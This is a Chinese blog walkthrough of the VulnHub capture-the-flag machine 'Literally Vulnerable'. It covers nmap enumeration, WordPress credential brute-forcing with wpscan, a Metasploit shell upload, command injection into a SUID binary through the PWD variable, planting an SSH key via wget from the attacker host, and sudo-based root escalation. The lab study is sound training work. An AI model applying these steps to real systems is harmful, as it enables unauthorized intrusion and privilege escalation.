LiterallyVulnerable

发表于 | 分类于 |
字数统计: 1,459 字 | 阅读时长 ≈ 8 分钟
LiterallyVulnerable

2020-03-08 14:26 — 2020-03-09

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
Flags: 3 (local.txt, user.txt & root.txt)
Difficulty Level: Initial Shell (Easy) - Privileges Escalation (Intermediate)
Website: https://ebryx.com
Hint: Maybe, you hasted and left some open holes unchecked?
Literally Vulnerable is supposed to give beginners a taste of real-world scenarios and OSCP machines at the same time! It was inspired highly by the @DC series.

You're supposed to know the big three (EEEs) Enumeration, Exploitation & Escalation of pentesting to pwn the machine. The machine is supposed to be beginner-friendly and the difficulty level is Easy-Intermediate depending on your knowledge. You need to have enough information about Linux file types & permissions for privileges escalation.

Technical Information:
Just download, extract and load the .vmx file in VMware Workstation (tested on VMware Workstation 15.x.x)
The adapter is currently NAT, networking is configured for DHCP and IP will get assigned automatically
Contact:
You can either contact me on twitter @syed__umar or linkedin (/in/syedumararfeen/) for hints!
There are three flags in the machine: local.txt, user.txt & root.txt. You're supposed to grab all three in order to completely pwn the machine. Hope you like the machine, best of luck! :)

I'll try my best to continue with the series!
--------
From : https://www.vulnhub.com/entry/ua-literally-vulnerable,407/
1
2
kali:172.16.252.129
目标:172.16.252.1/24

信息收集

主机存活:

1
nmap -n -sn -T5 -v 172.16.252.1/24 | grep -B 1 "Host is up"

目标端口服务:

1
nmap -n -Pn -sV -O 172.16.252.131
1
2
3
4
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.14.0 (Ubuntu)

全部端口:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 ftp ftp 325 Dec 04 13:05 backupPasswords 
| ftp-syst:
| 	STAT:
| FTP server status:
| Connected to ::ffff:172.16.252.129
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable 
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 
| ssh-hostkey:
| 2048 2f:26:5b:e6:ae:9a:c0:26:76:26:24:00:a7:37:e6:c1 (RSA)
| 256 79:c0:12:33:d6:6d:9a:bd:1f:11:aa:1c:39:1e:b8:95 (ECDSA) 
|_ 256 83:27:d3:79:d0:8b:6a:2a:23:57:5b:3c:d7:b4:e5:60 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-generator: WordPress 5.3
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Not so Vulnerable – Just another WordPress site 
|_http-trane-info: Problem with XML parsing of /evox/about
65535/tcp open http 
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

开启的端口:21、22、80、65535

FTP 匿名登陆

FTP 可以匿名访问,得到几个密码,暂不知用途:

1
ftp-anon: Anonymous FTP login allowed (FTP code 230)
1
2
3
4
5
6
7
8
9
10
*$eGRIf7v38s&p7 
yP$*SV09YOrx7mY 
GmceC&oOBtbnFCH 
3!IZguT2piU8X$c 
P&s%F1D4#KDBSeS
$EPid%J2L9LufO5 
nD!mb*aHON&76&G 
$*Ke7q2ko3tqoZo 
SCb$I^gDDqE34fA 
Ae%tM0XIWUMsCLp

2020-03-08 14-48-33屏幕截图

2020-03-08 14-49-20屏幕截图

Web 目录枚举

1
2
3
4
5
6
7
8
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-generator: WordPress 5.3
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Not so Vulnerable – Just another WordPress site 
|_http-trane-info: Problem with XML parsing of /evox/about
65535/tcp open http 
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

80 端口: nginx + Wordpress

65535端口:Apache

控制台显示资源请求错误多,可以看到它是从 literally.vulnerable 请求资源,可以设置 DNS:

1
echo "172.16.252.131    literally.vulnerable" >> /etc/hosts

2020-03-08 14-54-43屏幕截图

先扫描 65535 端口,逐一访问,得到 phpcms 页面,访问需要密码,wpsacn 枚举

1
dirsearch.py -u "http://172.16.252.131:65535" -e php --random-agents -w /usr/share/wordlists/dirb/big.txt

2020-03-08-15-13-12屏幕截图 

1
wpscan --url http://172.16.252.131:65535/phpcms/ --enumerate
1
2
3
4
[+] maybeadmin
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection)
[+] notadmin
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection)

得到两个用户名,使用前面得到的几个密码枚举爆破,碰运气,得到一组用户名密码:

1
wpscan --url http://172.16.252.131:65535/phpcms/ -U users.txt -P backupPasswords
1
2
[i] Valid Combinations Found:
| Username: maybeadmin, Password:$EPid%J2L9LufO5

2020-03-08-16-25-38屏幕截图

登录 Wordpress 后台

都翻了一遍,得到一组用户名和密码:

1
notadmin:Pa$$w0rd13!&

2020-03-08-16-41-43屏幕截图

登录系统(Getshell)

利用 MSF 上传木马 getshell

1
exploit/unix/webapp/wp_admin_shell_upload

2020-03-09-18-18-23屏幕截图

信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
meterpreter > sysinfo
Computer : literallyvulnerable
OS : Linux literallyvulnerable 4.15.0-88-generic #88-Ubuntu SMP Tue Feb 11 20:11:34 UTC 2020 x86_64
Meterpreter : php/linux
meterpreter >

######## lsb_release #############
www-data@literallyvulnerable:$ lsb_release -a lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 18.04.3 LTS
Release: 18.04
Codename: bionic

####### /etc/passwd #######
doe:x:1001:1001:Doe,,,:/home/doe:/bin/bash 
john:x:1000:1000:,,,:/home/john:/bin/bash

寻找 SUID 程序,得到可疑文件:itseasy 

1
find / -perm -u=s -type f 2>/dev/null

2020-03-09-19-27-43屏幕截图

权限提升(User)

运行 itseasy 得到当前目录绝对路径,看过一篇通过操控 PATH 参数值进行提权;怀疑程序调用了 pwd 命令

1
2
3
4
cd /tmp
cp /bin/bash /tmp/pwd    # or echo "/bin/bash" > /tmp/pwd
chmod 777 /tmp/pwd
export PATH=/tmp:$PATH

执行后,没有得到预期的结果

objdump -d 一下,看到个 getenv 函数,用来获取环境变量

也就是可以通过改变环境变量的值来控制这个程序:

1
export PWD=\$\(/bin/bash\)

2020-03-09-20-28-54屏幕截图

2020-03-09-19-42-16屏幕截图

然后输入命令没有回显了,直接 SSH :kali 下生成 ssh 公钥上传到目标机

1
cd /home/john/.ssh && wget http://172.16.252.129:8848/autorized_keys

信息收集

HOME 目录下的到一个 base64加密的密码

1
2
3
4
am9objpZWlckczhZNDlJQiNaWko= 
echo"am9objpZWlckczhZNDlJQiNaWko="| base64 -d 

john:YZW$s8Y49IB#ZZJ

2020-03-09-19-54-52屏幕截图

2020-03-09-20-02-37屏幕截图

2020-03-09-20-05-51屏幕截图

搜索 SUID 程序:

1
find/ -perm -u=s -type f 2>/dev/null
1
2
sudopasswd root
Sorry, user john is not allowed to execute '/usr/bin/passwd root' as root on literallyvulnerable.
1
2
3
4
5
6
7
sudo -l

Matching Defaults entries forjohn on literallyvulnerable:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/
sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
    User john may run the following commands on literallyvulnerable: 
        (root) /var/www/html/test.html

可以运行 /var/www/html/test.html

权限提升(root)

/var/www/html 目录下没有 test.html 文件,且 john 没有 html 目录的写权限,那就切换回 www-data 用户创建文件

1
2
echo "/bin/bash" > test.html
chmod 777 test.html

sudo 运行,提权成功

2020-03-09-20-19-09屏幕截图

2020-03-09-20-21-25屏幕截图

2020-03-09-20-21-43屏幕截图